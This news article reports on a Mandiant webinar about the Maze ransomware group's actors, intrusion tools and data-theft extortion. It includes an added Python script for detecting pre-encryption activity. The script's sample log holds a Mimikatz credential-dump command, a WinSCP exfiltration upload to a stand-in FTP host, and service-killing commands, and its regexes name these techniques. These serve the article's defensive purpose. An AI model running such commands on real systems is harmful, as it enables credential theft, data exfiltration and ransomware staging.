Mandiant dishes on notorious Maze ransomware group

Mandiant threat researchers navigate the tools, tactics and procedures of the Maze ransomware group, which has become notorious for "shaming" victims with stolen data.

FireEye's Mandiant Threat Intelligence took a deep dive into one of the most notorious ransomware groups around: Maze.

In a webinar last Thursday, Mandiant threat intelligence senior manager Kimberly Goody and threat intelligence manager Jeremy Kennelly shared insights into the Maze ransomware gang, including the various tactics, techniques and procedures (TTPs) with which the ransomware is deployed. Since November of last year, Mandiant has observed Maze ransomware used in operations that combine targeted intrusions, public exposure of victim data and an affiliate model. However, according to Mandiant, malicious actors have been actively deploying Maze ransomware since at least May 2019.

Based on its observations of alleged users in underground hacker forums and the distinct TTPs seen across incident response engagements, Mandiant believes multiple actors are involved in Maze ransomware operations. Mandiant found additional information on a public-facing website operated by Maze actors, who post data stolen from victims who refuse to pay an extortion fee.

Maze operators were the first to popularize the tactic of stealing data and combining traditional extortion with the deployment of ransomware. "It started in November 2019 when they posted a warning in a Russian-language forum that they'd release one company's data if they did not pay," Goody said.

In the post-compromise methodology, ransomware is not the first- or second-stage malware in the victim environment; it is deployed only after the attacker has established access, with the goal of encrypting as many machines as possible. According to Goody, this methodology gives the attacker numerous advantages, including the ability to search for and exfiltrate data from the victim environment before the encryptor runs.

Who is behind Maze?

In an accompanying blog post earlier this month, Mandiant said it "identified multiple Russian-speaking actors who claimed to use Maze ransomware and were seeking partners to fulfill different functional roles within their teams."

During the webinar, Goody and Kennelly shed additional light on the Maze threat actors, saying Mandiant is currently tracking three separate clusters of threat activity involved in the post-compromise distribution of Maze ransomware.

The most unique of the three groups is the financially motivated FIN6 group, which has been active since mid-2014, according to Mandiant.

"Unlike other groups that sit alone in clusters connected to only other Maze intrusion operations, FIN6 has a long history of financially motivated intrusions. They had a longtime focus on targeting point of sale (POS) devices, primarily using Trinity or FrameworkPOS [malware]," Kennelly said.

Since 2017, FIN6 has shifted toward stealing payment card data from web-based e-commerce platforms, harvesting card numbers and cardholder names. Though its tactics changed, Mandiant observed FIN6 continuing to reuse penetration testing tools such as Cobalt Strike and Metasploit.

Maze tools and techniques

Through late 2019, before the shift to the post-compromise methodology, Maze ransomware was distributed directly via exploit kits and spam campaigns. Now, Mandiant said, common tools include Mimikatz, used to extract credentials or tokens, and batch scripts that kill processes prior to execution of the ransomware. However, threat researchers have observed a broad range of approaches to network, host, data and Active Directory reconnaissance across the Maze incidents they have worked.

For example, Kennelly said in the webinar, one notable thing about the second Maze group is its intrusion vector. "In this case, we've seen them access networks via [Trojan] IcedID." In addition, Mandiant observed that this particular Maze group took only a small number of days from obtaining initial access to the environment to beginning active intrusion operations.

Intrusions also vary in how attackers obtained initial access: in some cases botnet operators sought out "penetration testers" to exploit access the botnet had already obtained, and in others penetration testers or other intermediaries sought access they could then exploit.

"But there are a few clear patterns in the manner in which the initial access is obtained. Banking trojans leading to compromise, initial access coming via compromised web applications and multiple cases where the attacker obtained initial access using legitimate credentials by logging into the corporate VPN infrastructure and/or the corporate system with an internet-facing admin interface. In some cases, it's plausible the accounts have weak passwords and attackers use brute force or credentials have been collected using spear-phishing or via precursor malware operations," Kennelly said in the webinar.

Common tools in the earlier stages of an intrusion also include the open source penetration testing tools BloodHound and PowerSploit/PowerView. Squidgate and Cobalt Strike's Beacon are commonly used to move laterally through the environment.

Data exfiltration and extortion

According to Kennelly, one clear pattern observed across nearly all intrusions was that the ransomware was deployed as soon as the data had been exfiltrated. Though exfiltration methods vary, Maze operators have been known to collect the data and upload it to an attacker-controlled FTP server. Some actors use WinSCP and PowerShell scripts for exfiltration, as well as cloud-based file hosting, via either direct upload or a synchronization utility.
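To turn the behaviours described above into something a SOC can actually check, here is an added example (not Mandiant's tooling, and not code from the webinar) that hunts a process-creation log for three precursors the article names: the batch-style process and service killing that runs ahead of the encryptor, Mimikatz-style credential dumping, and WinSCP/FTP/PowerShell exfiltration. The JSON field names, the regexes, the "five kill commands in five minutes" threshold and the sample events are all assumptions chosen for the demonstration; the sample log is constructed, not real telemetry.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log shape (an assumption for this example): one JSON object per
# line with "ts" (ISO-8601), "host", "user", "image" (full path of the new
# process) and "cmdline". Map Windows 4688 / Sysmon Event ID 1 fields onto it.

# Batch-script style process/service killing that precedes the encryptor.
PROCESS_KILL = re.compile(r"(taskkill(\.exe)?\s+.*(/im|/pid)\s|(net1?|sc)(\.exe)?\s+stop\s)", re.I)
# Mimikatz module syntax, or dumping LSASS for offline use (procdump is an assumption).
CRED_DUMP = re.compile(r"(sekurlsa::|lsadump::|privilege::debug|mimikatz|procdump.*lsass)", re.I)
# WinSCP / ftp.exe, (s)ftp URLs, and common PowerShell upload idioms (assumed patterns).
EXFIL_TOOL = re.compile(
    r"(\bwinscp\b|\bftp\.exe\b|s?ftp://|\.UploadFile\(|Invoke-(WebRequest|RestMethod)\b.*-InFile\b)", re.I)


def detect(lines, window=timedelta(minutes=5), kill_threshold=5):
    """Return (finding, host, detail) tuples for the given JSON log lines.

    Credential dumping and exfil tooling fire per event. Process killing is
    only reported when at least `kill_threshold` kill/stop commands run on one
    host inside `window`, because a single taskkill is routine admin noise.
    """
    findings = []
    kills = defaultdict(list)
    for raw in lines:
        if not raw.strip():
            continue
        ev = json.loads(raw)
        ts = datetime.fromisoformat(ev["ts"])
        text = f'{ev.get("image", "")} {ev.get("cmdline", "")}'
        if CRED_DUMP.search(text):
            findings.append(("credential_dumping", ev["host"], ev["cmdline"]))
        if EXFIL_TOOL.search(text):
            findings.append(("exfil_tooling", ev["host"], ev["cmdline"]))
        if PROCESS_KILL.search(text):
            kills[ev["host"]].append((ts, ev["cmdline"]))
    # Sliding window per host: report the first burst that crosses the threshold.
    for host, events in kills.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            burst = [cmd for t, cmd in events[i:] if t - t0 <= window]
            if len(burst) >= kill_threshold:
                findings.append(("mass_process_kill", host,
                                 f"{len(burst)} kill/stop commands within {window}, starting with: {burst[0]}"))
                break
    return findings


# Constructed sample log (not real telemetry). WS-042 runs a kill script,
# DC01 sees Mimikatz, FS01 pushes an archive to an attacker FTP server,
# WS-099 has one benign taskkill that must not be flagged.
SAMPLE_LOG = r"""
{"ts": "2020-05-12T02:50:00", "host": "DC01", "user": "CORP\\svc_backup", "image": "C:\\Users\\svc_backup\\AppData\\Local\\Temp\\m.exe", "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords exit"}
{"ts": "2020-05-12T03:05:12", "host": "FS01", "user": "CORP\\svc_backup", "image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe", "cmdline": "WinSCP.exe /command \"open ftp://up:pw@203.0.113.10\" \"put D:\\shares\\finance.7z\" exit"}
{"ts": "2020-05-12T03:10:00", "host": "WS-099", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\taskkill.exe", "cmdline": "taskkill /F /IM notepad.exe"}
{"ts": "2020-05-12T03:14:05", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\taskkill.exe", "cmdline": "taskkill /F /IM sqlservr.exe"}
{"ts": "2020-05-12T03:14:06", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\taskkill.exe", "cmdline": "taskkill /F /IM oracle.exe"}
{"ts": "2020-05-12T03:14:07", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net stop MSSQLSERVER /y"}
{"ts": "2020-05-12T03:14:09", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\sc.exe", "cmdline": "sc stop VSS"}
{"ts": "2020-05-12T03:15:10", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\taskkill.exe", "cmdline": "taskkill /F /IM outlook.exe"}
{"ts": "2020-05-12T03:15:30", "host": "WS-042", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\taskkill.exe", "cmdline": "taskkill /F /IM excel.exe"}
{"ts": "2020-05-12T03:20:00", "host": "WS-042", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net start Spooler"}
"""


def sample_events():
    return [line for line in SAMPLE_LOG.splitlines() if line.strip()]


if __name__ == "__main__":
    for finding, host, detail in detect(sample_events()):
        print(f"{finding:20} {host:8} {detail}")
```

The burst logic is the part worth keeping: a lone `taskkill` or `net stop` is daily administrative noise, but a run of them from one account against database, mail and shadow-copy services inside a couple of minutes is exactly the pre-encryption batch script the article describes, and it fires before any file is encrypted. Tune the threshold and window against your own baseline, and treat the credential-dumping and exfil hits as the earlier, higher-value alerts, since by the time the kill script runs the data has usually already left.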

Dwell time between initial access and the start of active intrusion operations varies dramatically, from one day to one year, Kennelly said in the webinar. Data theft and extortion may also lengthen attacker dwell time.

Mandiant is aware of more than 100 alleged Maze victims reported by various media outlets and on the Maze website since November 2019. Maze operators have become known for data shaming victims, on top of encryption.

"They collect one fee for the agreement not to release files and a separate fee for the encryptor. In December of 2019, operators registered a domain which would become the centralized location where victims and alleged data stolen from victims would be shared," Goody said in the webinar.

Through that website, Maze operators share domains, dates they encrypted files, volumes, examples of files and a list of impacted systems. Posting information of allegedly compromised organizations increases the pressure for victims to pay.

In order to defend against these attacks, Kennelly said, it's not the ransomware that's the issue. "Ransomware is a tool. It's the intrusion operations that precede it that need to be addressed individually," he said in the webinar.
